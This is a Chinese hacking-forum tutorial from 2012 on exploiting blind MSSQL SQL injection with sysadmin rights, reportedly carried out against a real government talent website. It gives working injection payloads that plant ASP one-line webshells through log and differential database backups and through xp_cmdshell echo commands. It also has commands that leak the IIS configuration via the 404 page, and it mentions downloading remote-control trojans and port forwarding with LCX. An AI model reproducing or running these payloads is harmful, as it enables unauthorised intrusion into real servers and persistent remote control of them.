找回密码
 立即注册
查看: 2675|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————7 @+ Z2 I3 s  N
5 p6 ]& B0 V. H8 Q4 v
4 J+ F' P- A0 ^2 e. E5 a
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
( x/ b+ L. Z7 {) d* T& o' l  K
, \9 G) N6 H: S1 S( b                                                                 9 {  _9 @0 D: g% c5 F3 s7 w
                                                                 
9 Z' ]# x9 e' U+ I( y1 L. G                                                                  论坛: http://www.90team.net/
+ k" v8 [( ]" u1 u( G- L  c
! n& p8 C9 O$ [2 y* U2 t- L( G+ P4 t( b# ]$ [$ m6 e& w
, |3 x2 F' C# ?5 E+ E2 |4 l
友情检测国家人才网: t& j$ K- C7 `- Z

7 S: y9 h! R8 J* w9 B( {9 g) U8 N( P" q8 D# ]
内容:MSSQL注入SA权限不显错模式下的入侵4 W- F4 q' s3 z! I7 ^3 m/ _

) \& c/ C, y5 E4 d5 ?/ E' y- ~! F" ~' ?' n( M
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。6 p2 H7 A/ L, n
0 B9 n8 }8 D7 P; U! t! T$ _" \
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
1 o4 Y* B- ~0 {; V8 o1 E0 b3 A, w! }' w1 R. {. [' l
5 j1 b' w/ o6 O9 \7 H. ], p: m
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
/ y- K; k( E; `1 r, `
! b5 l6 X8 J1 v3 W8 ^思路:# V; v/ z5 T2 @+ I, \+ D
2 _4 l: _2 [9 [3 P5 ^( v
首先:0 X  I6 }! B: V3 v
; u# j( i# J% U$ z* p! I, E
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
: j; B. G) u3 W1 Z. W4 X- h
7 I2 p7 @+ a  T3 L* W% i: r1 Y1.日志备份获得Webshell& \- W2 g+ W( T1 O8 J
6 z! E% Z5 `0 ^/ z6 e9 M
2.数据库差异备份获得Webshell) j, d& X# @) Q& E# e+ U$ A

+ J! q) C7 F4 M8 b4 ^4.直接下载免杀远控木马。! ~) o) ^2 z0 e7 {5 r0 U+ l
- q5 A8 M, ~& q6 w4 D4 Q
5.直接下载LCX将服务器端口转发出来3 Z: k6 |% E5 H. s( Z5 a

! ~! |$ E- V" g# X  H1 z* M/ z6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
1 X2 ]- d  `* z8 z' k6 r
+ \+ u* r  W- D' K" ]8 n3 u: `
- }# I* e( ^1 M$ r
( i/ Z7 h) |) {5 V+ C在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
; X: ~  t/ w& l( `+ M  {9 l, w3 k6 {; A, h( p) s3 Y" n6 u" K
我直接演示后面一个方法
2 d  X7 w8 a# {4 g. K
6 j8 R1 ~% O, \3 ]
  l0 {# a$ q% N' @; Z  \  f# E分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL 8 h* {( J. _: o3 U, b

. d- U0 B8 b9 T; q! F
2 ?% P: S6 d  m, n) L  _, |4 x$ i! Q/ ]2 w
0 h. E& G) Y9 t2 L  H
( W+ o. _$ c. W" P: u7 B6 `' i◆日志备份:' e/ O+ f& o1 H$ T$ W

. N. \' {' c: c# k- Q$ d8 D% S8 i. A$ E
1. 进行初始备份
# c6 S7 p2 e, v+ g; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--( f- K' t8 J7 }4 L* p8 q
( H1 s! C7 m! h# x  M9 z$ Q  j( r
2. 插入数据& g3 d7 i, d- O/ W
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--2 i2 d5 T  `9 X# ?/ T! u& H( B

7 I. F  @5 r: w$ v1 A+ f0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>3 V7 ?) L9 b6 b& @; ~( `) d
  
, I9 V/ E5 o. x$ P3. 备份并获得文件,删除临时表* v  C2 s- ^" _# H/ u* J$ r& R
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
( ~7 O9 B7 _* t7 B6 F9 |$ H# E, B6 a6 }4 V. }' a
$ ^: V( k0 D& n7 H! _/ j

$ |8 ]9 L) D8 v8 r: m$ s6 p◆数据库差异备份- j. W( G8 o( `2 b! V3 F

  ~# |; j7 X/ w( Q* d(1. 进行差异备份准备工作
0 K" [: [9 J% N  _2 l. ]! k* e" d& B- R$ q
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--4 o3 Y( S! n* Y6 L- x' j( x6 N

3 p# n6 b' h5 v* C. }上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
% ?3 y$ x' e  a! e) L/ i 4 c5 i7 @1 \% N5 E% t6 Z4 ]

; z' A3 W3 g* B(2. 将数据写入到数据库4 ?& Q% m5 N' s: R( o
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- 8 c. }) R- j* k) g% l

8 ?3 G; X9 x( z: [% S0 F6 s0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
# W! Z4 o+ h. J" U/ D, P; E. R1 R* S9 E6 H& u' X
3. 备份数据库并清理临时文件( i0 M0 N* x9 B! G; S/ ~9 m
, W# l- \3 c/ V6 u
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--$ ]; H& D+ i' i% U  i+ x% T

' Q: ^$ c3 h( g1 o* J* u( t0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
7 O& M" C: h" a1 Z# r8 Y. t; D
; `: `2 C% @, \- v3 S7 l1 B2 `9 p5 }

+ Y; M1 ^2 \9 [$ T% q用^转义字符来写ASP(一句话木马)文件的方法:   # t7 M% F8 ?/ O6 Z9 b

3 q6 [3 a/ P# s7 H; D9 E1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--1 d- {( @6 E# [. R

* R  j" F' B0 c  z% g2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
* }. W& o( n  \4 Y6 U% U! D7 M2 g5 ~0 J6 j
读取IIS配置信息获取web路径
3 W/ V+ g/ A1 a8 S0 i& D2 _' M' l, |5 b; h. O
     8 Z& T* \, e  W- n
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--& @: J/ p. @$ g3 b6 E. y& B
8 F4 Z4 ~. M7 Y: C# O# A
执行命令. N9 N: j; [2 ?% I
     
3 h2 R( e7 u2 a' p- U     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
' t2 v3 I* u* _* C/ W9 |. ]3 J9 g" S5 L. _* n; w% g5 O" S) L

. ]$ V6 z' I' U5 |3 E6 O9 ?4 Y7 ^4 c  \1 u1 X0 [7 X

# D6 O, s! }# q" |% M$ M# h9 M$ `  y- p2 V( p( T6 q

8 Z. ?( Q1 C+ d5 Z* G! M+ T2 L, \5 |; Y: F  n. M
; W( {5 O* ~4 I! f5 U% z

# U  J; f* Z0 T7 F! H3 V
. a6 D5 N7 _' R: t7 G* \0 ^7 g; q( a3 c) {5 @2 L

/ V! x2 r3 {+ |  ~* J' g
$ b7 S( v! G6 ~/ u3 B1 \
6 Z- `: X9 _& T* e7 {% [' t% t
7 a1 i  g) b, y* O& r2 H
2 i$ T$ m& |4 ^- q* x5 v+ R! l
& M/ }* L: Q3 b
2 q; W1 f0 l+ L# k0 Z+ {
: P1 G% Z2 K5 h- m+ p5 w& y% W  D# e  u" T

, D& p7 }/ q4 \! o. u, E7 u/ {, s1 K
6 `) r( ]. a+ Q7 ]$ O  V: ^) |# [6 L1 q7 B! T
' v3 T& l) C0 j* Q4 S2 }* S8 ]
* H! a6 T9 s, t

- |! S+ B; r! [6 C$ m8 S/ T
/ i8 B4 y1 J: K* N% B5 s
1 i% ^8 }& e7 l0 v; [. Z
/ ?: y8 z5 e2 c0 ]( V: ]2 Q: q* e3 P8 a1 B9 n6 P1 e7 M) q

, D! F6 Z2 c- }
8 ?: w) L8 m# {. I& ~. E5 C5 W. ]7 s# I3 k& a$ q) E3 P
( J% H: H, x1 Z, ?1 C
  i8 |% T" W6 V
* ]5 B6 w8 C7 B5 X2 T9 S7 v7 V

. |. p* Z: d1 A, i4 W
! _$ v$ M6 A, G4 x3 c: i
0 I$ K. y) w: g: T* [3 i7 d' L9 H9 K4 q$ _0 Q
# x7 ^3 a+ }& I( n$ r9 F2 ?
: m5 ?4 @) U0 c5 e, Q! g
/ r5 |% \( Y  ]' s4 \, V' W& V" S
9 v/ {( Q5 g3 h

( y9 j5 H7 [% m5 f, @" `' @$ B7 i0 w/ u

; R# k* q6 H0 B# z  {  |( H$ h# ?% a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表